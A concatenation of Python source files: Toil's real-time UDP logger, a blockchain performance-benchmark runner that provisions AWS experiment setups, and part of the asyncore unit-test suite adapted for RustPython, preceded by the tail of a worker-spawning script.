p = spawn(cmd)
time.sleep(1)
out_tbl[wid] = (p.stdout, p.stderr)
for wid in out_tbl.keys():
th = threading.Thread(target=dump_log, args=(opt.cmd, wid, out_tbl[wid], target_dir))
th.start()
if __name__ == '__main__':
pass
|
realtimeLogger.py | # Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a real-time UDP-based logging system that user scripts can use for debugging."""
import json
import logging
import logging.handlers
import os
import os.path
import socketserver as SocketServer
import threading
from types import TracebackType
from typing import Any, Optional, Type, TYPE_CHECKING
from toil.lib.misc import get_public_ip
from toil.statsAndLogging import set_log_level
if TYPE_CHECKING:
from toil.batchSystems.abstractBatchSystem import AbstractBatchSystem
logger = logging.getLogger(__name__)
class LoggingDatagramHandler(SocketServer.BaseRequestHandler):
"""
Receive logging messages from the jobs and display them on the leader.
Uses bare JSON message encoding.
"""
def handle(self) -> None:
"""
Handle a single message. SocketServer takes care of splitting out the messages.
Messages are JSON-encoded logging module records.
"""
# Unpack the data from the request
data, socket = self.request
try:
# Parse it as JSON
message_attrs = json.loads(data.decode('utf-8'))
# Fluff it up into a proper logging record
record = logging.makeLogRecord(message_attrs)
if isinstance(record.args, list):
# Going through JSON turned tuples into lists. Lazy formatting
# means this might have happened to all the arguments. We need
# to fix this at least for the root list of format string
# arguments, or formatting will fail
#
# TODO: Protect the arguments better by actually pickling
# instead of using JSON?
#
# TODO: Format the message on the sending side?
record.args = tuple(record.args)
except:
# Complain someone is sending us bad logging data
logging.error("Malformed log message from {}".format(self.client_address[0]))
else:
# Log level filtering should have been done on the remote end. The handle() method
# skips it on this end.
logger.handle(record)
class JSONDatagramHandler(logging.handlers.DatagramHandler):
"""
Send logging records over UDP serialized as JSON.
They have to fit in a single UDP datagram, so don't try to log more than 64kb at once.
"""
def makePickle(self, record: logging.LogRecord) -> bytes:
"""
Actually, encode the record as bare JSON instead.
"""
return json.dumps(record.__dict__).encode('utf-8')
class RealtimeLoggerMetaclass(type):
"""
Metaclass for RealtimeLogger that lets you do things like RealtimeLogger.warning(),
RealtimeLogger.info(), etc.
"""
def __getattr__(self, name: str) -> Any:
"""
If a real attribute can't be found, try one of the logging methods on the actual logger
object.
"""
return getattr(self.getLogger(), name)
class RealtimeLogger(metaclass=RealtimeLoggerMetaclass):
"""
Provides a logger that logs over UDP to the leader. To use in a Toil job, do:
>>> from toil.realtimeLogger import RealtimeLogger
>>> RealtimeLogger.info("This logging message goes straight to the leader")
That's all a user of Toil would need to do. On the leader, Job.Runner.startToil()
automatically starts the UDP server by using an instance of this class as a context manager.
"""
# The names of all environment variables used by this class are prefixed with this string
envPrefix = "TOIL_RT_LOGGING_"
# Avoid duplicating the default level everywhere
defaultLevel = 'INFO'
# State maintained on server and client
lock = threading.RLock()
# Server-side state
# The leader keeps a server and thread
loggingServer = None
serverThread = None
initialized = 0
# Client-side state
logger = None
@classmethod
def _startLeader(cls, batchSystem: 'AbstractBatchSystem', level: str = defaultLevel) -> None:
with cls.lock:
if cls.initialized == 0:
cls.initialized += 1
if level:
logger.info('Starting real-time logging.')
# Start up the logging server
cls.loggingServer = SocketServer.ThreadingUDPServer(
server_address=('0.0.0.0', 0),
RequestHandlerClass=LoggingDatagramHandler)
# Set up a thread to do all the serving in the background and exit when we do
cls.serverThread = threading.Thread(target=cls.loggingServer.serve_forever)
cls.serverThread.daemon = True
cls.serverThread.start()
# Set options for logging in the environment so they get sent out to jobs
ip = get_public_ip()
port = cls.loggingServer.server_address[1]
def _setEnv(name: str, value: str) -> None:
name = cls.envPrefix + name
os.environ[name] = value
batchSystem.setEnv(name)
_setEnv('ADDRESS', '%s:%i' % (ip, port))
_setEnv('LEVEL', level)
else:
logger.debug('Real-time logging disabled')
else:
if level:
logger.warning('Ignoring nested request to start real-time logging')
@classmethod
def _stopLeader(cls) -> None:
"""
Stop the server on the leader.
"""
with cls.lock:
assert cls.initialized > 0
cls.initialized -= 1
if cls.initialized == 0:
if cls.loggingServer:
logger.info('Stopping real-time logging server.')
cls.loggingServer.shutdown()
cls.loggingServer = None
if cls.serverThread:
logger.info('Joining real-time logging server thread.')
cls.serverThread.join()
cls.serverThread = None
for k in list(os.environ.keys()):
if k.startswith(cls.envPrefix):
os.environ.pop(k)
@classmethod
def getLogger(cls) -> logging.Logger:
"""
Get the logger that logs real-time to the leader.
Note that if the returned logger is used on the leader, you will see the message twice,
since it still goes to the normal log handlers, too.
"""
# Only do the setup once, so we don't add a handler every time we log. Use a lock to do
# so safely even if we're being called in different threads. Use double-checked locking
# to reduce the overhead introduced by the lock.
if cls.logger is None:
with cls.lock:
if cls.logger is None:
cls.logger = logging.getLogger('toil-rt')
try:
level = os.environ[cls.envPrefix + 'LEVEL']
except KeyError:
# There is no server running on the leader, so suppress most log messages
# and skip the UDP stuff.
cls.logger.setLevel(logging.CRITICAL)
else:
# Adopt the logging level set on the leader.
set_log_level(level, cls.logger)
try:
address = os.environ[cls.envPrefix + 'ADDRESS']
except KeyError:
pass
else:
# We know where to send messages to, so send them.
host, port = address.split(':')
cls.logger.addHandler(JSONDatagramHandler(host, int(port)))
return cls.logger
def __init__(self, batchSystem: 'AbstractBatchSystem', level: str = defaultLevel):
"""
A context manager that starts up the UDP server.
Should only be invoked on the leader. Python logging should have already been configured.
This method takes an optional log level, as a string level name, from the set supported
by bioio. If the level is None, False or the empty string, real-time logging will be
disabled, i.e. no UDP server will be started on the leader and log messages will be
suppressed on the workers. Note that this is different from passing level='OFF',
which is equivalent to level='CRITICAL' and does not disable the server.
"""
super().__init__()
self.__level = level
self.__batchSystem = batchSystem
def __enter__(self) -> None:
RealtimeLogger._startLeader(self.__batchSystem, level=self.__level)
# noinspection PyUnusedLocal
def __exit__(self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> None:
RealtimeLogger._stopLeader()
|
run.py | # Copyright 2020 ChainLab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import copy
import json
import logging.config
import os
import pprint
import sys
import threading
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from src.Experiment_Handler import Experiment_Handler
from src.Experiment_Handler import NetworkNotStartingError
from BlockchainFormation.utils.utils import *
from DAppFormation.DApp_Handler import DApp_Handler
from BlockchainFormation.Node_Handler import Node_Handler
class ArgParser:
def __init__(self):
"""Initialize an ArgParser object.
The general structure of calls from the command line is:
run.py --config path_to_config
"""
self.parser = argparse.ArgumentParser(description='This script evaluates Blockchains',
usage='Give path to config with all experiment relevant settings')
self.parser.add_argument('--config', '-c', help='enter path to config file')
self.parser.add_argument('--exp_dir', '-e', help='enter path to experiment directory')
self.parser.add_argument('--freqs', '-f', help='enter frequency', type=int, nargs='+')
self.parser.add_argument('--shape', '-s', help='enter shape')
self.parser.add_argument('--duration', '-d', help='enter duration',type=int)
self.parser.add_argument('--delta_max_time', '-m', help='enter max time',type=int)
def load_config(self, namespace_dict):
"""
Loads the config from a given JSON file
:param namespace_dict: namespace dict containing the config file path
:return: config dict
"""
# print(namespace_dict)
if vars(namespace)["exp_dir"] == None:
if namespace_dict['config'].endswith('.json'):
try:
with open(namespace_dict['config']) as json_file:
return json.load(json_file)
except:
logger.error("ERROR: Problem loading the given config file")
else:
logger.exception("Config file needs to be of type JSON")
raise Exception("Config file needs to be of type JSON")
else:
if "exp_dir" in list(namespace_dict.keys()):
try:
with open(f"{namespace_dict['exp_dir']}/config.json") as json_file:
config = json.load(json_file)
config['number_of_setups'] = 1
config['number_of_experiments'] = 1
for key in namespace_dict:
config["experiment_settings"][key] = namespace_dict[key]
return config
except Exception as e:
logger.exception(e)
logger.error("ERROR: Problem loading the experiment")
if __name__ == '__main__':
dir_name = os.path.dirname(os.path.realpath(__file__))
logging.basicConfig(filename=f'{dir_name}/logger.log', level=logging.DEBUG,
format='%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
logging.captureWarnings(True)
# create logger with
logger = logging.getLogger(__name__)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
logger.info(" ___ ___ ___ ")
logger.info(" | | ___ | | | | ")
logger.info(" | D |\ | | /| P |---| S | ")
logger.info(" |___| \| L |/ |___| |___| ")
logger.info(" |___| ")
logger.info(" ")
logger.info(" ====================================================== ")
logger.info(" Distributed Ledger Performance Scan ")
logger.info(" ====================================================== ")
logger.info(" ")
logger.info(" ")
logger.info(" ____________ _____________ ____________ ")
logger.info(" /__________ /| /___________ /| /__________ /| ")
logger.info(" | | | | | | | | | ")
logger.info(" | BMW |-|----| Uni.LU |-|----| FhG FIT | | ")
logger.info(" | | | | | | | FIM | | ")
logger.info(" | | | | | | | | | ")
logger.info(" | P. Ross | / | | / |J. Sedlmeir| / ")
logger.info(" |___________|/ |____________|/ |___________|/ ")
logger.info(" ")
logger.info(" ")
logger.info(" ====================================================== ")
logger.info(" Licensed under the Apache License, Version 2.0 ")
logger.info(" =======================================================")
logger.info(" ")
logger.info(" ")
logger.info(" ____ _____ _ ____ _____ ")
logger.info(" / ___| |_ _| / \ | _ \ |_ _| ")
logger.info(" \___ \ | | / _ \ | |_) | | | ")
logger.info(" ___) | | | / ___ \ | _ < | | ")
logger.info(" |____/ |_| /_/ \_\ |_| \_\ |_| ")
logger.info(" ")
logger.info(" ")
argparser = ArgParser()
namespace = argparser.parser.parse_args()
# loading the total experiment config
config = argparser.load_config(vars(namespace))
# print(vars(namespace))
# print(vars(namespace)["exp_dir"])
# print(vars(namespace)["exp_dir"] is None)
# print(vars(namespace)["exp_dir"] == None)
# print(vars(namespace)["exp_dir"] == "None")
if vars(namespace)["exp_dir"] == None:
print("Startup mode selected")
# os.system(f"truncate -s 0 {dir_name}/logger.log")
# os.truncate(path=f"{dir_name}/logger.log", length=10)
# splitting the config into single experiment configs
setup_configs = []
experiment_configs = []
blockchain_config = config['blockchain_formation_settings']
client_config = config['client_settings']
experiment_config = config['experiment_settings']
number_setups = config['number_of_setups']
number_experiments = config['number_of_experiments']
# Loop through all possible setups and start network/clients, run experiments and shutdown network/client again
for index in range(0, number_setups):
blockchain_config_run = {}
if len(blockchain_config['vm_count']) == 1:
blockchain_config_run['vm_count'] = blockchain_config['vm_count'][0]
elif len(blockchain_config['vm_count']) == number_setups:
blockchain_config_run['vm_count'] = blockchain_config['vm_count'][index]
else:
raise Exception(f"config[blockchain_formation_settings][vm_count] has invalid length")
if len(blockchain_config['instance_type']) == 1:
blockchain_config_run['instance_type'] = blockchain_config['instance_type'][0]
elif len(blockchain_config['instance_type']) == number_setups:
blockchain_config_run['instance_type'] = blockchain_config['instance_type'][index]
else:
raise Exception(f"config[blockchain_formation_settings][instance_type] has invalid length")
blockchain_config_run['instance_provision'] = "aws"
if len(blockchain_config['aws_region']) == 1:
blockchain_config_run['aws_region'] = blockchain_config['aws_region'][0]
elif len(blockchain_config['aws_region']) == number_setups:
blockchain_config_run['aws_region'] = blockchain_config['aws_region'][index]
else:
raise Exception(f"config[blockchain_formation_settings][aws_region] has invalid length")
for key in blockchain_config:
if key in ["vm_count", "instance_type", "instance_provision", "aws_region"]:
pass
elif key == f"{blockchain_config['blockchain_type']}_settings":
help = blockchain_config[f"{blockchain_config['blockchain_type']}_settings"]
help_run = {}
for l in help:
if len(help[l]) == 1:
help_run[l] = help[l][0]
elif len(help[l]) == number_setups:
help_run[l] = help[l][index]
else:
raise Exception(f"config[blockchain_formation_settings][{blockchain_config['blockchain_type']}_settings][{l}] has invalid length")
blockchain_config_run[f"{blockchain_config['blockchain_type']}_settings"] = help_run
else:
blockchain_config_run[key] = blockchain_config[key]
client_config_run = {}
for key in client_config:
if len(client_config[key]) == 1 or type(client_config[key] is dict):
client_config_run[key] = client_config[key][0]
elif len(client_config[key]) == number_setups:
client_config_run[key] = client_config[key][index]
else:
raise Exception(f"config[client_settings][{key}] has invalid length")
setup_configs.append(dict([("blockchain_formation_settings", blockchain_config_run), ("client_settings", client_config_run)]))
for index in range(0, number_experiments):
experiment_config_run = {}
for key in experiment_config:
if len(experiment_config[key]) == 1:
experiment_config_run[key] = experiment_config[key][0]
elif len(experiment_config[key]) == number_experiments:
experiment_config_run[key] = experiment_config[key][index]
else:
raise Exception(f"config[experiment_settings][{key}] has invalid length")
experiment_configs.append(experiment_config_run)
for index in range(0, number_setups):
# os.system("rm logger.log")
# os.system("touch logger.log")
try:
blockchain_config_help = setup_configs[index]['blockchain_formation_settings']
# Create Client VMs if needed with the same subnet/security/proxy settings as blockchain network
# if blockchain_config_help['instance_provision'] == "aws":
client_config_help = copy.deepcopy(blockchain_config_help)
# TODO Doo we need client_config and client_formation config? Only one should be enough right?
# Delete blockchain specific settings from conf
client_config_help.pop(f"{blockchain_config_help['blockchain_type']}_settings", None)
# TODO Implement option to host client nodes in a different subnet. Needed since the private VPC subnets are rather small (<60 IPs available)
client_config_help["vm_count"] = setup_configs[index]['client_settings']["number_of_clients"]
client_config_help["instance_type"] = setup_configs[index]['client_settings']["client_type"]
client_config_help["instance_provision"] = setup_configs[index]['client_settings']['instance_provision']
client_config_help['aws_region'] = setup_configs[index]['client_settings']["aws_region"]
client_config_help["user"] = blockchain_config["user"]
client_config_help["priv_key_path"] = blockchain_config["priv_key_path"]
# elif blockchain_config['instance_provision'] == "own":
# client_config = dapp_config['client_settings']
if blockchain_config_help["blockchain_type"] == "indy":
client_config_help["blockchain_type"] = "indy_client"
elif blockchain_config_help["blockchain_type"] == "acapy":
blockchain_config_help["blockchain_type"] = "indy"
client_config_help["blockchain_type"] = "acapy"
else:
client_config_help["blockchain_type"] = "client"
client_config_help["tag_name"] = setup_configs[index]['client_settings']["tag_name"]
client_config_help['exp_dir'] = setup_configs[index]['client_settings']["exp_dir"]
# Set this to None temporarily to allow threading
client_config_help["client_settings"] = {
# "target_network_conf": self.vm_handler_blockchain.get_config_path(),
"target_network_conf": None
}
if blockchain_config_help["blockchain_type"] == "fabric" and blockchain_config_help["fabric_settings"]["prometheus"] == True:
logger.info("Fabric selected - adding additional config")
additional_config_help = copy.deepcopy(blockchain_config_help)
# Insert prometheus_settings in fabric_config
additional_config_help.pop(f"{blockchain_config_help['blockchain_type']}_settings", None)
additional_config_help["vm_count"] = 1
additional_config_help["aws_region"] = {"eu-central-1": 1}
additional_config_help["instance_type"] = "m5.large"
additional_config_help["blockchain_type"] = "prometheus"
additional_config_help["user"] = blockchain_config_help["user"]
additional_config_help["priv_key_path"] = blockchain_config_help["priv_key_path"]
additional_config_help["prometheus_settings"] = {}
additional_config_help["tag_name"] = "blclab_prometheus"
additional_config_help["additional_settings"] = {
"target_network_conf": None
}
else:
additional_config_help = None
"""
logger.info("Blockchain config: ")
pprint.pprint(blockchain_config_help)
logger.info(" ")
logger.info(" ")
logger.info("Client config: ")
pprint.pprint(client_config_help)
logger.info(" ")
logger.info(" ")
logger.debug("Additional config: ")
pprint.pprint(additional_config_help)
"""
# Creating a new Experiment Handler
if blockchain_config_help["blockchain_type"] == "fabric" and blockchain_config_help["fabric_settings"]["prometheus"] == True:
# experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger, Node_Handler(additional_config_help)), config, [experiment_configs[index]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger, Node_Handler(additional_config_help)), config, experiment_configs)
else:
# experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger), config, [experiment_configs[index]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger), config, experiment_configs)
logger.info(" ")
logger.info("==========================================================")
logger.info("==========Starting Blockchain and Client Network==========")
logger.info("==========================================================")
logger.info(" ")
try:
experiment_handler.start_dapp()
experiment_handler.run_experiment()
# catching ctrl-c and killing network if desired
except KeyboardInterrupt:
logger.info("CTRL-C detected. Exiting gracefully by terminating network if desired.")
if yes_or_no("Do you want to shut down the whole network? If yes, the next experiment will be carried out."):
pass
else:
raise KeyboardInterrupt
except Exception as e:
logger.exception(e)
pass
logger.info(" ")
logger.info("========================================================")
logger.info("======= Terminating Blockchain and Client Network ======")
logger.info("======= ======")
logger.info("======= Evaluation Experiment ======")
logger.info("========================================================")
logger.info(" ")
network_termination_thread = threading.Thread(target=experiment_handler.terminate_network, name="DApp-Termination")
experiment_evaluation_thread = threading.Thread(target=experiment_handler.evaluate_experiment, name="Experiment-Evaluation")
network_termination_thread.start()
experiment_evaluation_thread.start()
network_termination_thread.join()
experiment_evaluation_thread.join()
except Exception as e:
logger.exception(e)
logger.info(f"Setup {index} failed.")
else:
print("\n\n\n")
print(config)
print("\n\n\n")
print([config["experiment_settings"]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(config["blockchain_formation_settings"]), Node_Handler(config["client_settings"]), logger), config, [config["experiment_settings"]])
try:
experiment_handler.run_experiment()
except Exception as e:
logger.exception(e)
logger.info(" ")
logger.info(" ")
logger.info(" _____ _ _ ____ ")
logger.info(" | ____| | \ | | | _ \ ")
logger.info(" | _| | \| | | | | | ")
logger.info(" | |___ | |\ | | |_| | ")
logger.info(" |_____| |_| \_| |____/ ")
logger.info(" ")
logger.info(" ")
logger.info(" ")
|
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
import threading
from test import support
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.monotonic()
while n > 0 and time.monotonic() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
support.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
support.join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'assertion failed: `(left != right)` left: `-1`, right: `-1`'")
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
